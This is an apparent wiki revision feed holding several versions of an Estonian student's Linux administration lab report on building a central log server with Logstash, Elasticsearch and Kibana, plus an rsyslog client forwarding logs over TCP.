		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68982"/>
		<updated>2013-11-28T11:30:11Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;br /&gt;
&lt;br /&gt;
Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
== Logstash ==&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Elasticsearch ==&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kibana ==&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan kliendis rsyslogi konfiguratsioonifaili&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Seletused:&lt;br /&gt;
&lt;br /&gt;
*.* kõik logifailid&lt;br /&gt;
&lt;br /&gt;
@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.&lt;br /&gt;
&lt;br /&gt;
192.168.56.210 - &amp;quot;logimassin&amp;quot; serveri ip-aadress&lt;br /&gt;
&lt;br /&gt;
10514 - logide saatmise ja vastuvõtmise port&lt;br /&gt;
&lt;br /&gt;
Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
192.168.56.210          logimassin.planet.zz         logimassin&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68981</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68981"/>
		<updated>2013-11-28T11:23:34Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Kasutatud tarkvara */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;br /&gt;
&lt;br /&gt;
Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.&lt;br /&gt;
&lt;br /&gt;
= Protokoll =&lt;br /&gt;
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).&lt;br /&gt;
&lt;br /&gt;
Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.&lt;br /&gt;
&lt;br /&gt;
/etc/hostname failis asendasin masina nimeks &#039;&amp;quot;logimassin&amp;quot;&#039;. Koos domeeninimega on masina nimi &amp;quot;logimassin.planet.zz&amp;quot; (FQDN).&lt;br /&gt;
&lt;br /&gt;
== Logstash ==&lt;br /&gt;
Kasutatud S. Arnus lahendust&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install openjdk-7-jre&lt;br /&gt;
mkdir /etc/logstash&lt;br /&gt;
&lt;br /&gt;
wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar &lt;br /&gt;
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:&lt;br /&gt;
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
input {&lt;br /&gt;
        #Linux/Unix süsteemidest tulevad logid&lt;br /&gt;
        tcp {&lt;br /&gt;
                type =&amp;gt; &amp;quot;syslog-tcp&amp;quot;&lt;br /&gt;
                port =&amp;gt; 10514&lt;br /&gt;
        }&lt;br /&gt;
        #Logiserveri enda logid&lt;br /&gt;
        file {&lt;br /&gt;
                type =&amp;gt; &amp;quot;logserver&amp;quot;&lt;br /&gt;
                path =&amp;gt; [ &amp;quot;/var/log/syslog&amp;quot;, &amp;quot;/var/log/*.log&amp;quot; ]&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
 &lt;br /&gt;
output {&lt;br /&gt;
        #Saadetakse andmebaasi&lt;br /&gt;
        elasticsearch {&lt;br /&gt;
        }&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon automaatse käivituse jaoks kirje &#039;&#039;upstart&#039;&#039;i&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/logstash-server.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# logstash server instance&lt;br /&gt;
description     &amp;quot;logstash server instance&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
env HOME=/etc/logstash&lt;br /&gt;
chdir /etc/logstash&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
#Minimaalne ja maksimaalne javale lubatud mälumaht&lt;br /&gt;
#env JAVA_OPTS=&#039;-Xms512m -Xmx512m&#039;&lt;br /&gt;
 &lt;br /&gt;
script&lt;br /&gt;
      exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf&lt;br /&gt;
end script&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon kausta /var/log/logstash ja kasutaja nimega logstash&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /var/log/logstash&lt;br /&gt;
adduser --system --disabled-password --no-create-home --group --quiet logstash&lt;br /&gt;
usermod -a -G adm logstash&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan vajalike kaustade omanikuks kasutaja nimega &amp;quot;logstash&amp;quot; ja grupi &amp;quot;adm&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
chown -R logstash:adm /etc/logstash/&lt;br /&gt;
chown -R logstash:adm /var/log/logstash/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Elasticsearch ==&lt;br /&gt;
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb&lt;br /&gt;
dpkg -i elasticsearch-0.90.0.deb&lt;br /&gt;
rm elasticsearch-0.90.0.deb&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse käivitamine&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service elasticsearch start&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Kibana ==&lt;br /&gt;
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt-get install ruby1.9.3 rubygems&lt;br /&gt;
&lt;br /&gt;
wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz&lt;br /&gt;
tar -zxf v0.2.0.tar.gz&lt;br /&gt;
mv Kibana-0.2.0/ /etc/kibana&lt;br /&gt;
rm v0.2.0.tar.gz&lt;br /&gt;
cd /etc/kibana&lt;br /&gt;
gem install bundler&lt;br /&gt;
bundle install&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat &amp;quot;KibanaHost&amp;quot; stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
KibanaHost = ‘192.168.56.210’&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Loon upstarti kirje kibana automaatseks käivitamiseks&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano /etc/init/kibana.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# kibana.conf# kibana - log viewer&lt;br /&gt;
description     &amp;quot;Kibana logstash viewer&amp;quot;&lt;br /&gt;
 &lt;br /&gt;
start on virtual-filesystems&lt;br /&gt;
stop on runlevel [06]&lt;br /&gt;
 &lt;br /&gt;
respawn&lt;br /&gt;
respawn limit 5 30&lt;br /&gt;
limit nofile 65550 65550&lt;br /&gt;
 &lt;br /&gt;
# Environment&lt;br /&gt;
env HOME=/etc/kibana/&lt;br /&gt;
chdir /etc/kibana&lt;br /&gt;
setuid logstash&lt;br /&gt;
setgid adm&lt;br /&gt;
console log&lt;br /&gt;
 &lt;br /&gt;
# Run Kibana, which is in /etc/kibana&lt;br /&gt;
script&lt;br /&gt;
      ruby /etc/kibana/kibana.rb&lt;br /&gt;
end script&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.&lt;br /&gt;
&lt;br /&gt;
== Kliendi seadistamine ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Ligipääs ja testimine =&lt;br /&gt;
Veebiliidesest on võimalik ligi&lt;br /&gt;
&lt;br /&gt;
http://192.168.56.210:5601&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
KLIENT&lt;br /&gt;
&lt;br /&gt;
Rsyslog on juba paigaldatud, kui aga ei oleks&lt;br /&gt;
apt-get install rsyslog&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nano /etc/rsyslog.conf&lt;br /&gt;
TCP juurde kuskile panin&lt;br /&gt;
*.* @@192.168.56.210:10514&lt;br /&gt;
&lt;br /&gt;
kaks @ märki garanteerib selle, et teateid saadetakse TCP protokolli kaudu (turvaline, QoS)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ja lõpuks&lt;br /&gt;
service rsyslog restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ja brauserist näen erinevaid logisid mõlemast serverist&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
panin ka puppetmaster serveri käima, et klienti tuleks puppeti logid - tulidki.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68980</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68980"/>
		<updated>2013-11-28T11:10:56Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Ülesande püstitus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68979</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68979"/>
		<updated>2013-11-28T11:10:32Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Ülesande püstitus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|&amp;quot;Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses&amp;quot;] ja selle IT Kolledži wiki materjal [Keskse_logilahenduse_rakendamine].&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68978</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68978"/>
		<updated>2013-11-28T11:04:22Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Ülesande püstitus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
